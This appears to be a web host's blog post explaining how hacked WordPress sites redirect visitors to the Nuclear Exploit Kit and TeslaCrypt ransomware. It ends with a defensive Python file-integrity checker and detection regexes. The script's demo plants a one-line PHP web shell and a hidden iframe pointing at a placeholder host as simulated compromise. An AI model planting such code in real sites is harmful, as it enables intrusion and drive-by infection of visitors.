Ransomware – Holding your business hostage

Ransomware is one of the fastest growing and most damaging cyber-crimes on the Internet today. This type of malware encrypts your files, or otherwise locks you out of your website and/or data, until a ransom is paid through an online payment method, usually in bitcoin (a digital currency).

The most recent high-profile attack took place when the Hollywood Presbyterian Medical Center was infected with this kind of malware. According to staff at the centre, the infection took out the systems responsible for CT scans, documentation, lab work, pharmacy functions and electronic communications. The siege lasted approximately 10 to 12 days; during that time a state of emergency was declared and patients were reportedly moved to other hospitals. To put an end to the electronic hostage situation, the medical centre paid 40 bitcoins, approximately $17,000.

So, how on earth did this happen?

For this type of attack to work, the attackers rely on security vulnerabilities on several systems at once. First they need a number of compromised websites to deliver the attack, and then they need a site visitor whose own computer is running vulnerable software, such as an out-of-date browser or browser plugin, so that the ransomware can be installed. Break either link and the chain fails.

A more detailed guide to the steps involved has been provided by WordPress security experts Wordfence. These details focus on WordPress vulnerabilities because WordPress is the most popular web publishing system on the planet.

  1. A WordPress site is hacked through any method available. That may be a brute force password guessing attack or by exploiting a vulnerability in a plugin, theme or core.
  2. The attacker installs code on the WordPress site that redirects visitors to other infected websites that are running the Nuclear Exploit Kit. The redirects may happen through a series of websites to try and prevent web browsers and Google from warning you that a site is infected. The sites involved in the redirect change frequently.
  3. When a visitor to the infected site is redirected, the Nuclear Exploit Kit searches for vulnerabilities in the site visitor’s Flash Plugin, Microsoft Silverlight, Adobe Reader or Internet Explorer.
  4. If Nuclear finds a vulnerability, it exploits the visitor machine and installs the TeslaCrypt Ransomware.
  5. The ransomware then encrypts all files on the workstation and extorts the owner into paying to get their system decrypted.

Courtesy of Wordfence – https://www.wordfence.com/blog/2016/02/wordpress-ransomware-teslacrypt-mint-linux-hacked

When a workstation is infected with the TeslaCrypt ransomware, the victim sees a screen like the following.

TeslaCrypt Ransomware Screenshot

Courtesy of Bromium Labs & Wordfence

What should you do?

Just like your computer’s operating system, your website’s Content Management System (CMS) and its plugins should be free of known vulnerabilities when they are released, but attackers are always looking for new ways in and new vulnerabilities are discovered all the time. To keep your scripts and website assets protected over the long term it is essential that vulnerable scripts are updated promptly, that malware scans are performed regularly, and that files are monitored for unexpected changes. The redirect code described above has to be written into a file on your site, so a theme file that changes when you have not updated anything, or a new PHP file appearing in an uploads folder, is the earliest warning sign you will get. There are various WordPress plugins that will perform these tasks for you, or you can have them managed by your website developers. At Dreamscape we are able to manage your website’s security regardless of whether you host with us or had your website developed by our team.

The same chain also depends on out-of-date software on the visitor’s computer, so keeping browsers, Flash, Silverlight and Adobe Reader patched (or removing plugins you do not actually need), and keeping offline backups of important files so an infected workstation can be restored without paying, protects you as a visitor even when a site you browse has been hacked.
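As an added worked example (not code from Wordfence or from this page), the following Python script shows the two checks recommended above applied to the attack chain described earlier: it takes a SHA-256 baseline of a WordPress install, reports files that were added, removed or modified since the baseline, and runs a few signature patterns over the changed files for the kind of injected redirect or obfuscated loader code that step 2 of the chain plants in a hacked theme or plugin. The directory layout, file contents, the `redirector.invalid` hostname and the signature patterns are all constructed for this demonstration; real exploit-kit redirectors are re-obfuscated frequently, which is why the hash comparison is the more reliable of the two checks.

```python
"""Minimal WordPress file-integrity and injected-redirect check (added example)."""
import hashlib
import re
import tempfile
from pathlib import Path

# Signatures of the kind of redirect/loader code an attacker plants in a hacked
# theme or plugin. Constructed for this example and far from exhaustive.
SUSPICIOUS_PATTERNS = {
    "obfuscated_eval": re.compile(r"eval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\(", re.I),
    "hidden_iframe": re.compile(r"<iframe[^>]*\b(?:width|height)\s*=\s*[\"']?0\b", re.I),
    "js_redirect": re.compile(r"window\.(?:top\.)?location(?:\.href)?\s*=\s*[\"']https?://", re.I),
    "php_redirect": re.compile(r"header\s*\(\s*[\"']Location:\s*https?://", re.I),
    "meta_refresh": re.compile(r"<meta[^>]+http-equiv\s*=\s*[\"']refresh", re.I),
}


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path) -> dict:
    """Map every file under root (relative POSIX path) to its SHA-256.
    Take this right after a clean install or update and keep it outside the web root."""
    return {p.relative_to(root).as_posix(): sha256_of(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def diff_against_baseline(baseline: dict, current: dict) -> dict:
    """Which files appeared, disappeared, or changed content since the baseline."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(k for k in baseline.keys() & current.keys()
                           if baseline[k] != current[k]),
    }


def scan_for_injections(root: Path, rel_paths) -> dict:
    """Run the signature patterns over the given files; returns path -> hit names."""
    hits = {}
    for rel in rel_paths:
        text = (root / rel).read_text(encoding="utf-8", errors="replace")
        names = [name for name, pat in SUSPICIOUS_PATTERNS.items() if pat.search(text)]
        if names:
            hits[rel] = names
    return hits


def check_site(root: Path, baseline: dict) -> dict:
    changes = diff_against_baseline(baseline, build_baseline(root))
    # Injected code lands in new or modified files, so those are scanned first.
    changes["injections"] = scan_for_injections(root, changes["added"] + changes["modified"])
    return changes


def demo() -> dict:
    """Constructed scenario: a clean theme, a baseline, then an injected footer
    and a dropped loader file, as an attacker in step 2 of the chain would leave behind."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        theme = root / "wp-content" / "themes" / "example"
        theme.mkdir(parents=True)
        (theme / "footer.php").write_text("<?php wp_footer(); ?>\n</body></html>\n")
        (theme / "style.css").write_text("/* Theme Name: Example */\n")
        baseline = build_baseline(root)

        # Simulated compromise (constructed; redirector.invalid is a placeholder host).
        with (theme / "footer.php").open("a") as f:
            f.write('<iframe src="http://redirector.invalid/x" width="0" height="0"></iframe>\n')
        uploads = root / "wp-content" / "uploads"
        uploads.mkdir()
        (uploads / "cache.php").write_text('<?php eval(base64_decode($_POST["c"])); ?>\n')

        return check_site(root, baseline)


if __name__ == "__main__":
    import json
    print(json.dumps(demo(), indent=2))
```

Saved as, say, `wp_integrity_check.py` and run with `python3`, the demo reports `cache.php` as added, `footer.php` as modified, and a signature hit on each. In practice you would take the baseline immediately after a clean install or update, store it somewhere an attacker who can edit `footer.php` cannot also edit, and run the comparison from cron, treating any change you did not make yourself as an incident rather than waiting for a pattern match.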

Securing your website is critically important, not just to protect your investment and reputation, but to protect your site visitors. Get in touch if you would like to discuss your site’s security further.